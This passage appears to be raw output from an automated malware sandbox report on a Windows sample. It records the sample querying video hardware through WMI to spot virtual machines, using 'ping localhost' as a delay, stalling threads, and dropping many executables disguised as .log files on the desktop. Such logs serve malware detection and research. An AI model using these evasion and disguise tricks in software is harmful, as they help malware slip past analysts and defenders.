Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Memory allocated: BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Memory allocated: 1A960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 10E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1AC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1AEB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1A60000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1B510000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: AE0000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1A6F0000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1820000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1B3F0000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1480000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1AE40000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 960000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1A780000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1AEA0000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: B90000 memory reserve \| memory write watch
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Memory allocated: 1A6E0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Thread delayed: delay time: 922337203685477

Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iSLkMDwk.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TYnMSebw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BpwztmWB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RAMHNFsb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hUZevebs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cuiLHKPV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pdJUqKUa.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qrwDMrig.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cYXMozly.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oOhryAfv.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nvvlJpme.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nuOBvxNF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fXRNARLX.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZfooXlGj.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dgbVxyFV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HQUAuzHx.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\waDRLkih.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DOypUrKc.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wQKprcQn.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\grWVOsjw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZuAdpowF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SwGfVNiy.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CQWhyrvh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JEszLdwN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ohaCMYDg.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aTWLrgjG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SoXNqeHs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pkzkNEOy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\luItGIOF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HplZKgpp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WQnMOzSe.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zgBjPAwH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GBhRZStr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qjNliHHb.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JGbOwXPR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ehScSkLt.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zzTAZvvH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bmeDyKvy.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MwRFEUPK.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hLfttZpU.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fiPsZiXa.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kFEuCsml.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UcbVcsDq.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ifVUOvZl.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uIPRftWP.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oMWtDbZy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XoywUTAh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IlfySofL.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HxbpgajN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zAAjmmUg.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CdAHeASz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dcBDaqCa.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IUYfDSlJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ejtNoRQz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WaJXtmYR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ChaYBIVv.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UyzMiIGL.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dfuljGgw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UyIFNWAo.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BBFiueAC.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FzdFbFVV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\adnNjHjk.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PhxVLhaD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VClwANRP.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UsWpvprv.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YksUcbqD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YNJWsoOG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lejLFetb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\miMCrVKD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pVxSCwGb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LTSgQlLh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uqqCdnCx.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\orpJRxcA.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wSNBpqnJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BNVQohxV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ENiSZQDC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GPaymKbQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gVWkEyHr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iGwCTAyR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RYEpuIuX.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EihSxCbb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HQSFHwhn.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fJtKXqkZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fzytxiEW.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FVlaiPXZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uFzSfHem.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MQtollac.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\quplWHMD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sbpbUBOr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zrjhuLVB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ySSJffnK.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tGqbwPqT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UGLNXWUK.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HiZYWSbq.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zXHyMvKj.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IjUzWPZN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MLpHgvqI.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZqkeqCFc.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RzlVrZnV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nONBTjme.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bYEWJish.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\swbUrqRy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KozQBPIf.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cvPvVBnu.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yjZbtAhM.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\urIzQXcN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oGldkuRF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zDtRwDyC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FfPYKNJo.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rkEsDtOz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iOIEHOMQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UfIwHmIl.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\laJtiVqg.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fuqEGhOs.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cYNuQcag.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OwBiJsIk.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FXwZeocX.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EbCAWgmB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oDsvbdmi.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bdHDOXcB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BUFrAOsF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hXRMEvFO.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WXBCJNum.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mBGMFuin.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EoSiPjjU.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lznUObWJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rOokxXeT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SyoPiFGW.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qJBbnKCZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XHQMeNzh.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ppoidSFB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GLAhPCYV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KPopdtuG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wnSKynRr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zjtRYRad.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hfHcbqAm.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PqqGNnMb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iIdmhsXq.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uzrRvGCS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dObMrONS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WdCFCCCo.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lbqdvNOF.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZQQluKfk.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sqwCQUcY.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\giAKkGeJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bEzNzlOz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JOnPlldQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qQNccXPY.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jEubeWaS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IuCyCayI.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eLulMUIY.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NJvfkcmc.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pUZBMbtU.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\slzTDrMW.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NWmyzMoB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DZeKnCHE.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oUFLhKAD.log	Jump to dropped file
